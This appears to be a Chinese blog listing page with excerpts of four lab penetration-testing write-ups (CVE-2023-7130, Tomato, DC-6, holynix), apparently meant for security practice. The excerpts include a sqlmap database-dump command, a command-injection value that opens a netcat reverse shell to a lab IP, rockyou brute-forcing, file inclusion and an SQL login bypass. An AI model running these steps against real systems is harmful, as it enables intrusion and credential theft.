- 博客(4)
- 收藏
- 关注
原创 春秋云境CVE-2023-7130
python3 sqlmap.py -r 地址 -batch -dbs。进入界面有个登陆,我们直接登陆进去。复制post包,保存为1.txt。发送到repeater。发现进去就是报错注入。使用sqlmap爆破。
2024-09-25 18:49:01
422
原创 Tomato
信息收集获取ip扫描端口及服务扫描目录开始访问首页是一张图片server-status是一个目录antibot_image发现目录遍历漏洞里面发现了文件包含的命令,允许远程读取url文件,但是不允许包含url文件,可以进行利用尝试查看passwd文件、既然可以查看密码文件,那我们尝试查看一下其他文件查看日志文件,日志文件记录了其他用户的一些操作,其中或许留有线索反弹shell。
2024-09-25 18:47:52
689
原创 DC-6靶机
将包改成 souhu.com|nc -e /bin/bash 192.168.221.128 4444。使用kali下的usr/share/wordists/rockyou.txt密码字典进行爆破。进入到/usr/share/wordlists下你会发现有一个rockyou.txt.gz。发现开放了80.22端口,访问一下http://192.168.221.151:80。发现一个http://192.168.221.151/wp-admin。将脚本修改一下,将/bin/bash写入脚本。
2024-09-25 18:46:54
1798
原创 holynix
输入以后直接报错,而且暴漏了sql查询语句,可以看到这个sql查询语句对username字段的单引号进行了转义,但是password没有,所以我们只要username随便输,password用万能密码登陆即可。这句话暴漏了两个信息1,文件上传之后的上传位置可能是用户的家目录,也就是/home/alamo,第二,alamo的权限不够,需要寻找更高权限的用户。读取失败了,出现报错,先不管,继续在左边的栏目看看又没有可以代码执行或文件上传的地方,最后在upload模块发现可以上传文件。
2024-09-25 18:45:47
876
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅